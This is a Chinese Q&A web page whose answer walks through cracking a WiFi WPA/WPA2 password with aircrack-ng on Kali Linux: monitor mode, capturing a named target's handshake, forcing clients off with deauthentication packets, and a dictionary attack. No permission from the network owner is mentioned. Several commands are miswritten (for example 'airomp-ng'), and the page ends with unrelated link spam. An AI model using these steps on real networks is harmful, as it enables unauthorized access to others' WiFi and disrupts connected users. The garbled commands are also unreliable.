问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

Kali系统使用Aircrack-ng进行暴力破解WIFI密码

发布网友 发布时间:2022-11-25 18:08

我来回答

1个回答

热心网友 时间:2023-10-09 15:26

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。

使用Kali 2021.3进行演示操作
软件:aircrack-ng (Kali系统内置)
外置无线网卡设备:要支持监听,支持Linux并且免驱(我这里使用的是RT3070)

命令:<code>sudo su</code>
解释:不在管理员模式下运行可能会有权限不够的提示

命令:<code>iwconfig/ifconfig</code>
解释:iwconfig查看网卡的信息、ifconfig查看新连接的设备
wlan0就是我们的无线网卡

命令:<code>airmon-ng check kill</code>
解释:杀死进程可以让搜索更准确,不会受到影响

命令:<code>airmon-ng</code>
出现你的网卡信息就说明你的网卡支持监听

命令:<code>airmon-ng start wlan0</code>
解释:start 开启哪个接口 wlan0 是接口的名字

再用iwconfig查看一下网卡信息,wlan0后面多了个mon,wlan0mon就说明已经开启监听了

命令:<code>airomp-ng wlan0mon</code>
解释:BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称

命令:<code>airomp-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon</code>
解释:

我要破解的目标网络是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹
输入命令:airomp-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon

当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包

命令:<code>aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon</code>
解释:

执行命令<code>aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon</code>
捕捉到握手包时就停止攻击

命令:<code>aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap</code>
解释:

最后就是等待跑字典了,下面就是破解的WIFI密码

命令:<code>airmon-ng stop wlan0mon</code>
在监听模式下,kali不能连接网络

插入网卡,如果查看不到网卡信息,可以点开连接WIFI看一下能否搜索到附近的网络,如果不行那就右键系统可移动设备-把网卡断开再重新连接一下

插入网卡,打开网卡的监听模式,搜索附近的WIFI,获取握手包,最后跑字典破解握手包,这里给大家提供一个常用的密码字典

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
弱弱的问一句R9 270X显卡怎么样~ 能带得起我的AMD 240CPU么?_百度知 ... i54570cpu华硕z87a主板要配多少的内存条和显卡 i5 3570k配R9 270X显卡,用什么主板和电源? 很容易上火是什么原因 口干舌燥五心烦热失眠多梦夜不能寐请问是什么原因,吃什么能有效... 想问看大家对老妻少夫的问题有何看法? ...战记第十三章第6关打法 山海战记13-6攻略-手游攻略-游戏鸟手游网 ...战记第十七章第1关打法 山海战记17-1攻略-手游攻略-游戏鸟手游网 ...山海战记9-6图文攻略-手游攻略-游戏鸟手游网 ...战记第十二章第2关打法 山海战记12-2攻略-手游攻略-游戏鸟手游网 小米手机中,有那几款是支持5.8G网络的?谢谢 2匹空调适合多大空间 猫癣药浴用什么药 猫癣药浴用什么药好 猫得猫癣用什么药 猫藓药浴什么药最有效 如何让客户感到你是专家-销售心理学之顾问式销售 京东闪付在pos机都可以刷吗? 一个手机怎么创建两个 谁知道83年的今年多少岁? 83年出生的今年几岁 半成品翅中空气炸锅要炸多长时间 鸡翅放空气炸锅要几分钟 石家庄便宜的宾馆 把自己写的东西发在哪里可以查重避免被抄袭? 灼口综合征一般要多久能好起来呢? 灼口综合症一般要多久能好? 灼口综合征要多久能好? 3c公司怎么样新宝 在ATM机上用4300元现金转账到异地,对方只收到900元,怎么办? 什么是物流系统化 什么叫系统化 表示选择错误的诗句 如果有一天自己决定的某一次选择是错的,可已无法重来要怎么办? 一个可以同时登两个手机吗 一个可以同时登两个手机吗 具体操作步骤 同一个可以同时在两个手机上登录吗 AT系列全频音箱高端会议厅专业音箱_GAEpro音响品牌 耳朵上面有个小孔是怎么回事 什么是钢管牌号 我想问问豪爵dk125s怎么样好不好 惠普6535s fz667pa 如何安装盗版XP系统啊? 惠普Compaq 6531s(FW167PA),我要装XP,去哪里下载驱动啊? 豪爵dk125s如何好不好? 请问一下豪爵dk125s怎么样好不好 民生保险公司 十大小众轻奢品牌女装 四字小众品牌 博士名城附近小家电维修地点 [学习帮助] 一道06高考生物选择题 (悬赏30分) 瀚斯宝丽是哪个国家的了 什么公司,?